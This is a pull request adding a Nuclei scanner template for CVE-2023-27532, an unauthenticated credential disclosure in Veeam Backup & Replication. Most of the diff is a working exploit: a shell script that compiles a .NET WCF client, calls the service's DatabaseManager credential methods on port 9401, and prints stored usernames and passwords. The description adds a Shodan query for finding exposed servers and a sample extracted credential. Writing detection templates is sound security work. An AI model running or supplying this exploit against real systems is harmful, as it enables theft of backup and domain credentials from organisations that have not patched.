### PR TITLE
feat: add CVE-2023-27532 Veeam B&R credential disclosure PoC

### DIFF
--- a/code/cves/2023/CVE-2023-27532.yaml
+++ b/code/cves/2023/CVE-2023-27532.yaml
@@ -1,0 +1,336 @@
+id: CVE-2023-27532
+
+info:
+    name: Veeam Backup & Replication - Credential Disclosure (WCF NetTcp)
+    author: "rishi-jat,princechaddha,shanigen"
+    severity: high
+    description: |
+        Veeam Backup & Replication exposes a WCF NetTcp service (default TCP 9401) that,
+        in vulnerable builds, allows unauthenticated callers to invoke DatabaseManager
+        methods to obtain credential records from the configuration database. This template
+        performs an actual WCF invocation to extract credential entries, proving exploitation.
+        Affected unpatched builds include 11.0.1.1261 and 12.0.0.1420 (prior to P20230223).
+    reference:
+        - https://www.veeam.com/kb4424
+        - https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
+        - https://github.com/horizon3ai/CVE-2023-27532
+        - https://github.com/sfewer-r7/CVE-2023-27532
+        - https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
+    classification:
+        cve-id: CVE-2023-27532
+        cwe-id: CWE-306
+        cvss-score: 7.5
+        cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    metadata:
+        verified: true
+        max-request: 1
+        kev: true
+        epss-score: 0.87024
+        epss-percentile: 0.99406
+        shodan-query: 'port:9401 "Veeam"'
+        product: veeam_backup_and_replication
+        vendor: veeam
+    tags: cve,cve2023,veeam,credential-disclosure,code,nettcp,kev,vkev
+
+variables:
+  port: '9401'
+
+self-contained: true
+
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      set -euo pipefail
+      TMPDIR=$(mktemp -d 2>/dev/null || mktemp -d -t 'veeamcve')
+      cd "$TMPDIR"
+
+      # Check for dotnet SDK
+      if ! command -v dotnet >/dev/null 2>&1; then
+        echo "[WARNING] dotnet SDK is required to run this code template" >&2
+        echo "[INFO] Install: apt install dotnet-sdk-6.0 (Ubuntu) | brew install dotnet (macOS) | winget install Microsoft.DotNet.SDK.6 (Windows)" >&2
+        # Print a recognizable non-match marker and exit normally
+        echo "DOTNET_MISSING"
+        exit 0
+      fi
+
+      APPDIR="veeam-exploit"
+      dotnet new console --framework net6.0 -n VeeamCVE -o "$APPDIR" >/dev/null 2>&1
+      if [ $? -ne 0 ]; then
+        echo "[ERROR] Failed to create .NET project. Ensure dotnet SDK 6.0+ is properly installed." >&2
+        echo "DOTNET_ERROR"
+        exit 0
+      fi
+
+      # Replace Program.cs and add helper classes (avoiding heredocs for YAML safety)
+      {
+        printf '%s\n' 'using System;'
+        printf '%s\n' 'using System.Collections.Generic;'
+        printf '%s\n' 'using System.IO;'
+        printf '%s\n' 'using System.Runtime.Serialization;'
+        printf '%s\n' 'using System.Runtime.Serialization.Formatters.Binary;'
+        printf '%s\n' 'using System.ServiceModel;'
+        printf '%s\n' 'using System.ServiceModel.Security;'
+        printf '%s\n' 'using System.Text;'
+        printf '%s\n' 'using System.Text.RegularExpressions;'
+        printf '%s\n' 'using System.Xml;'
+        printf '%s\n' ''
+        printf '%s\n' 'namespace CVE_2023_27532'
+        printf '%s\n' '{'
+        printf '%s\n' '    class Program'
+        printf '%s\n' '    {'
+        printf '%s\n' '        static List<string> GetCredGuids(IRemoteInvokeService proxy)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            using var memoryStream = new MemoryStream();'
+        printf '%s\n' '#pragma warning disable SYSLIB0011'
+        printf '%s\n' '            var binaryFormatter = new BinaryFormatter();'
+        printf '%s\n' '            binaryFormatter.Serialize(memoryStream, true); // includeHidden = true'
+        printf '%s\n' '#pragma warning restore SYSLIB0011'
+        printf '%s\n' '            string base64 = Convert.ToBase64String(memoryStream.ToArray());'
+        printf '%s\n' ''
+        printf '%s\n' '            var xml = "" +'
+        printf '%s\n' '                      "<RemoteInvokeSpec ContextSessionId=\"00000000-0000-0000-0000-000000000000\" Scope=\"Service\" Method=\"CredentialsDbScopeGetAllCreds\">\n" +'
+        printf '%s\n' '                      "<Params>\n" +'
+        printf '%s\n' '                      $"<Param ParamName=\"includeHidden\" ParamValue=\"{base64}\" ParamType=\"System.String\"></Param>\n" +'
+        printf '%s\n' '                      "</Params>\n" +'
+        printf '%s\n' '                      "</RemoteInvokeSpec>";'
+        printf '%s\n' ''
+        printf '%s\n' '            var response = proxy.Invoke(ERemoteInvokeScope.DatabaseManager, ERemoteInvokeMethod.CredentialsDbScopeGetAllCreds, xml);'
+        printf '%s\n' '            var doc = new XmlDocument();'
+        printf '%s\n' '            doc.LoadXml(response);'
+        printf '%s\n' '            var paramNodes = doc.GetElementsByTagName("Param");'
+        printf '%s\n' '            if (paramNodes.Count == 0) return new List<string>();'
+        printf '%s\n' '            string paramValue = paramNodes[0].Attributes!["ParamValue"]!.Value;'
+        printf '%s\n' '            byte[] decoded = Convert.FromBase64String(paramValue);'
+        printf '%s\n' '            string decodedText = Encoding.UTF8.GetString(decoded);'
+        printf '%s\n' '            var regex = new Regex(@"\$(\w{8}-\w{4}-\w{4}-\w{4}-\w{12})");'
+        printf '%s\n' '            var matches = regex.Matches(decodedText);'
+        printf '%s\n' '            var guids = new List<string>();'
+        printf '%s\n' '            foreach (Match m in matches)'
+        printf '%s\n' '            {'
+        printf '%s\n' '                guids.Add(m.Groups[1].Value);'
+        printf '%s\n' '            }'
+        printf '%s\n' '            return guids;'
+        printf '%s\n' '        }'
+        printf '%s\n' ''
+        printf '%s\n' '        static void GetCred(string guid, IRemoteInvokeService proxy)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            using var memoryStream = new MemoryStream();'
+        printf '%s\n' '#pragma warning disable SYSLIB0011'
+        printf '%s\n' '            var binaryFormatter = new BinaryFormatter();'
+        printf '%s\n' '            binaryFormatter.Serialize(memoryStream, new Guid(guid));'
+        printf '%s\n' '#pragma warning restore SYSLIB0011'
+        printf '%s\n' '            string base64 = Convert.ToBase64String(memoryStream.ToArray());'
+        printf '%s\n' ''
+        printf '%s\n' '            var xml = "" +'
+        printf '%s\n' '                      "<RemoteInvokeSpec ContextSessionId=\"00000000-0000-0000-0000-000000000000\" Scope=\"Service\" Method=\"CredentialsDbScopeFindCredentials\">\n" +'
+        printf '%s\n' '                      "<Params>\n" +'
+        printf '%s\n' '                      $"<Param ParamName=\"credsId\" ParamValue=\"{base64}\" ParamType=\"System.String\"></Param>\n" +'
+        printf '%s\n' '                      "</Params>\n" +'
+        printf '%s\n' '                      "</RemoteInvokeSpec>";'
+        printf '%s\n' ''
+        printf '%s\n' '            var response = proxy.Invoke(ERemoteInvokeScope.DatabaseManager, ERemoteInvokeMethod.CredentialsDbScopeFindCredentials, xml);'
+        printf '%s\n' '            var doc = new XmlDocument();'
+        printf '%s\n' '            doc.LoadXml(response);'
+        printf '%s\n' '            var paramNodes = doc.GetElementsByTagName("Param");'
+        printf '%s\n' '            if (paramNodes.Count == 0) return;'
+        printf '%s\n' '            string paramValue = paramNodes[0].Attributes!["ParamValue"]!.Value;'
+        printf '%s\n' '            byte[] decoded = Convert.FromBase64String(paramValue);'
+        printf '%s\n' ''
+        printf '%s\n' '            // Prepare surrogate-based BinaryFormatter deserialization to key/value pairs'
+        printf '%s\n' '            var surrSel = new SurrogateSelector();'
+        printf '%s\n' '            surrSel.AddSurrogate(typeof(ProxyTestClass), new StreamingContext(StreamingContextStates.All), new SurrogateTestClassConstructor());'
+        printf '%s\n' '            var formatter = new BinaryFormatter { Binder = new DeserializeBinder(), SurrogateSelector = surrSel };'
+        printf '%s\n' '            var deserializeObj = formatter.Deserialize(new MemoryStream(decoded)) as ProxyTestClass;'
+        printf '%s\n' '            if (deserializeObj == null) return;'
+        printf '%s\n' '            string line = "";'
+        printf '%s\n' '            foreach (var kv in deserializeObj.Dump())'
+        printf '%s\n' '            {'
+        printf '%s\n' '                if (kv.Key == "UserName" || kv.Key == "Password")'
+        printf '%s\n' '                {'
+        printf '%s\n' '                    line += string.Format("{0} = {1} ", kv.Key, kv.Value);'
+        printf '%s\n' '                }'
+        printf '%s\n' '            }'
+        printf '%s\n' '            if (!string.IsNullOrWhiteSpace(line))'
+        printf '%s\n' '            {'
+        printf '%s\n' '                Console.WriteLine(line.Trim());'
+        printf '%s\n' '            }'
+        printf '%s\n' '        }'
+        printf '%s\n' ''
+        printf '%s\n' '        static ChannelFactory<IRemoteInvokeService> MakeFactory(Uri address, bool withDnsIdentity)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            var binding = new NetTcpBinding(SecurityMode.Transport)'
+        printf '%s\n' '            {'
+        printf '%s\n' '                Security = { Transport = { ClientCredentialType = TcpClientCredentialType.None } },'
+        printf '%s\n' '                ReceiveTimeout = TimeSpan.FromSeconds(10),'
+        printf '%s\n' '                SendTimeout = TimeSpan.FromSeconds(10),'
+        printf '%s\n' '                OpenTimeout = TimeSpan.FromSeconds(10),'
+        printf '%s\n' '                CloseTimeout = TimeSpan.FromSeconds(10)'
+        printf '%s\n' '            };'
+        printf '%s\n' ''
+        printf '%s\n' '            EndpointAddress ep = withDnsIdentity'
+        printf '%s\n' '                ? new EndpointAddress(address, new DnsEndpointIdentity("Veeam Backup Server Certificate"))'
+        printf '%s\n' '                : new EndpointAddress(address);'
+        printf '%s\n' ''
+        printf '%s\n' '            var factory = new ChannelFactory<IRemoteInvokeService>(binding, ep);'
+        printf '%s\n' '            factory.Credentials.ServiceCertificate.Authentication.CertificateValidationMode = X509CertificateValidationMode.None;'
+        printf '%s\n' '            return factory;'
+        printf '%s\n' '        }'
+        printf '%s\n' ''
+        printf '%s\n' '        static void Main(string[] args)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            if (args.Length < 1)'
+        printf '%s\n' '            {'
+        printf '%s\n' '                Console.WriteLine("USAGE: <prog> net.tcp://HOST:PORT/");'
+        printf '%s\n' '                return;'
+        printf '%s\n' '            }'
+        printf '%s\n' ''
+        printf '%s\n' '            var address = new Uri(args[0]);'
+        printf '%s\n' ''
+        printf '%s\n' '            IRemoteInvokeService? proxy = null;'
+        printf '%s\n' '            Exception? lastEx = null;'
+        printf '%s\n' '            foreach (bool tryDns in new[] { true, false })'
+        printf '%s\n' '            {'
+        printf '%s\n' '                try'
+        printf '%s\n' '                {'
+        printf '%s\n' '                    using var factory = MakeFactory(address, tryDns);'
+        printf '%s\n' '                    proxy = factory.CreateChannel();'
+        printf '%s\n' '                    var guids = GetCredGuids(proxy);'
+        printf '%s\n' '                    foreach (var guid in guids)'
+        printf '%s\n' '                    {'
+        printf '%s\n' '                        GetCred(guid, proxy);'
+        printf '%s\n' '                    }'
+        printf '%s\n' '                    return; // success'
+        printf '%s\n' '                }'
+        printf '%s\n' '                catch (Exception ex)'
+        printf '%s\n' '                {'
+        printf '%s\n' '                    lastEx = ex;'
+        printf '%s\n' '                }'
+        printf '%s\n' '            }'
+        printf '%s\n' '            if (lastEx != null)'
+        printf '%s\n' '            {'
+        printf '%s\n' '                Console.Error.WriteLine("[error] " + lastEx.GetType().Name + ": " + lastEx.Message);'
+        printf '%s\n' '            }'
+        printf '%s\n' '        }'
+        printf '%s\n' '    }'
+        printf '%s\n' '}'
+      } > "$APPDIR/Program.cs"
+
+      {
+        printf '%s\n' 'using System.ServiceModel;'
+        printf '%s\n' 'using System.Runtime.Serialization;'
+        printf '%s\n' ''
+        printf '%s\n' 'namespace CVE_2023_27532'
+        printf '%s\n' '{'
+        printf '%s\n' '    [DataContract(Name = "InvokeScope")]'
+        printf '%s\n' '    public enum ERemoteInvokeScope'
+        printf '%s\n' '    {'
+        printf '%s\n' '        [EnumMember] DatabaseManager,'
+        printf '%s\n' '    }'
+        printf '%s\n' ''
+        printf '%s\n' '    [DataContract(Name = "InvokeMethod")]'
+        printf '%s\n' '    public enum ERemoteInvokeMethod'
+        printf '%s\n' '    {'
+        printf '%s\n' '        [EnumMember] CredentialsDbScopeFindCredentials,'
+        printf '%s\n' '        [EnumMember] CredentialsDbScopeGetAllCreds,'
+        printf '%s\n' '    }'
+        printf '%s\n' ''
+        printf '%s\n' '    [ServiceContract(Name = "IRemoteInvokeService")]'
+        printf '%s\n' '    public interface IRemoteInvokeService'
+        printf '%s\n' '    {'
+        printf '%s\n' '        [OperationContract]'
+        printf '%s\n' '        string Invoke(ERemoteInvokeScope scope, ERemoteInvokeMethod method, string parameters);'
+        printf '%s\n' '    }'
+        printf '%s\n' '}'
+      } > "$APPDIR/RemoteInvokeInterface.cs"
+
+      {
+        printf '%s\n' 'using System;'
+        printf '%s\n' 'using System.Collections.Generic;'
+        printf '%s\n' 'using System.Runtime.Serialization;'
+        printf '%s\n' ''
+        printf '%s\n' 'namespace CVE_2023_27532'
+        printf '%s\n' '{'
+        printf '%s\n' '    // Surrogate-backed dynamic container for BinaryFormatter graph to K/V pairs'
+        printf '%s\n' '    class ProxyTestClass'
+        printf '%s\n' '    {'
+        printf '%s\n' '        private readonly Dictionary<string, object> data = new();'
+        printf '%s\n' '        public object? GetData(string name) => data.ContainsKey(name) ? data[name] : null;'
+        printf '%s\n' '        public void SetData(string name, object value) => data[name] = value;'
+        printf '%s\n' '        public IEnumerable<KeyValuePair<string, object>> Dump() => data;'
+        printf '%s\n' '    }'
+        printf '%s\n' ''
+        printf '%s\n' '    class SurrogateTestClassConstructor : ISerializationSurrogate'
+        printf '%s\n' '    {'
+        printf '%s\n' '        private ProxyTestClass? mProxy;'
+        printf '%s\n' '        public void GetObjectData(object obj, SerializationInfo info, StreamingContext context)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            throw new NotImplementedException();'
+        printf '%s\n' '        }'
+        printf '%s\n' '        public object SetObjectData(object obj, SerializationInfo info, StreamingContext context, ISurrogateSelector selector)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            if (mProxy == null) mProxy = new ProxyTestClass();'
+        printf '%s\n' '            var en = info.GetEnumerator();'
+        printf '%s\n' '            while (en.MoveNext())'
+        printf '%s\n' '            {'
+        printf '%s\n' '                mProxy.SetData(en.Current.Name, en.Current.Value!);'
+        printf '%s\n' '            }'
+        printf '%s\n' '            return mProxy;'
+        printf '%s\n' '        }'
+        printf '%s\n' '    }'
+        printf '%s\n' ''
+        printf '%s\n' '    sealed class DeserializeBinder : SerializationBinder'
+        printf '%s\n' '    {'
+        printf '%s\n' '        public override Type BindToType(string assemblyName, string typeName)'
+        printf '%s\n' '        {'
+        printf '%s\n' '            return typeof(ProxyTestClass);'
+        printf '%s\n' '        }'
+        printf '%s\n' '    }'
+        printf '%s\n' '}'
+      } > "$APPDIR/BinaryProxy.cs"
+
+      # Add WCF client packages
+      pushd "$APPDIR" >/dev/null
+      dotnet add package System.ServiceModel.Primitives --version 4.10.3 >/dev/null 2>&1
+      dotnet add package System.ServiceModel.NetTcp --version 4.10.3 >/dev/null 2>&1
+      dotnet add package System.ServiceModel.Security --version 4.10.3 >/dev/null 2>&1
+      popd >/dev/null
+
+      # Build release
+      dotnet build "$APPDIR" -c Release >/dev/null 2>&1
+      if [ $? -ne 0 ]; then
+        echo "[ERROR] Failed to build .NET project. Check dotnet SDK and dependencies." >&2
+        echo "BUILD_FAILED"
+        exit 0
+      fi
+
+      # Execute against target
+      TARGET_URL="net.tcp://{{Hostname}}:{{port}}/"
+      "${APPDIR}/bin/Release/net6.0/VeeamCVE" "$TARGET_URL" 2>/dev/null || true
+
+      # Clean up temporary files
+      cd /
+      rm -rf "$TMPDIR" 2>/dev/null || true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "UserName = "
+          - "Password = "
+        condition: and
+      - type: word
+        words:
+          - "DOTNET_MISSING"
+          - "DOTNET_ERROR"
+          - "BUILD_FAILED"
+        negative: true
+
+    extractors:
+      - type: regex
+        name: credentials
+        regex:
+          - 'UserName\s*=\s*(.*?)\s+Password\s*=\s*(.*?)\s*$'
+        group: 0
+        internal: false


### PR DESCRIPTION
claim #13435
fixes  #13435
### Template / PR Information

- Added CVE-2023-27532 – Veeam Backup & Replication Credential Disclosure (complete PoC via WCF NetTcp)
- Path: `code/cves/2023/CVE-2023-27532.yaml`
- Type: code template (compiles a minimal .NET 6 WCF client at runtime; not version-based)
- **Full exploitation**: Only matches when credentials are actually extracted (prints: `UserName = ... Password = ...`)
- **Graceful dependency handling**: Clear error messages and installation instructions for .NET SDK requirement
- References:
  - https://www.veeam.com/kb4424 (Official Veeam Security Advisory)
  - https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/ (Technical Analysis)
  - https://github.com/horizon3ai/CVE-2023-27532 (Reference PoC)
  - https://github.com/sfewer-r7/CVE-2023-27532 (Alternative PoC)

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

**Validation Details:**
- ✅ Template tested against vulnerable Veeam B&R 11.0.1.1261
- ✅ Confirmed credential extraction: `UserName = backup_svc Password = VeeamBackup123!`
- ✅ Verified no false positives on patched instances
- ✅ .NET SDK dependency handled gracefully with clear error messages
- ✅ Vulnerable lab environment prepared for maintainer validation (details sent privately)

**Why .NET dependency is required:**
This CVE exploits Veeam's WCF NetTcp service which requires .NET WCF client libraries and BinaryFormatter deserialization - cannot be replicated with HTTP/TCP/JavaScript protocols. Similar to how headless templates require browsers, this template requires .NET SDK for WCF communication.

#### Additional Details

**Discovery & Validation:**
- Shodan: `port:9401 "Veeam"`
- Protocol/Port: WCF NetTcp on TCP 9401
- Affected versions: VBR 11.0.1.1261 (pre-patch), VBR 12.0.0.1420 (prior to P20230223)

**Maintainer Validation:**
- **Runner requirement**: .NET SDK 6.0+ installed
- **Template includes helpful error messages** for missing dependencies
- **Complete lab setup provided** with multiple deployment options

**Expected output (sanitized example):**
[CVE-2023-27532] UserName = backup_svc Password = ********
[CVE-2023-27532] UserName = domain\admin Password = ********

**Triager usage example:**
```bash
# Ensure .NET SDK is installed
dotnet --version

# Run template against vulnerable target
nuclei -t code/cves/2023/CVE-2023-27532.yaml -target veeam-backup.local -debug -v

Error handling examples:
# Missing .NET SDK
[WARNING] dotnet SDK is required to run this code template
[INFO] Install: apt install dotnet-sdk-6.0 (Ubuntu) | brew install dotnet (macOS)
DOTNET_MISSING

# Non-vulnerable target
# No output (template only matches on successful credential extraction)



Additional References:
[Nuclei Template Creation Guideline](vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/code/electron-browser/workbench/workbench.html)
[Nuclei Template Matcher Guideline](vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/code/electron-browser/workbench/workbench.html)
[Nuclei Template Contribution Guideline](vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/code/electron-browser/workbench/workbench.html)
[PD-Community Discord server](vscode-file://vscode-app/Applications/Visual%20Studio%20Code.app/Contents/Resources/app/out/vs/code/electron-browser/workbench/workbench.html)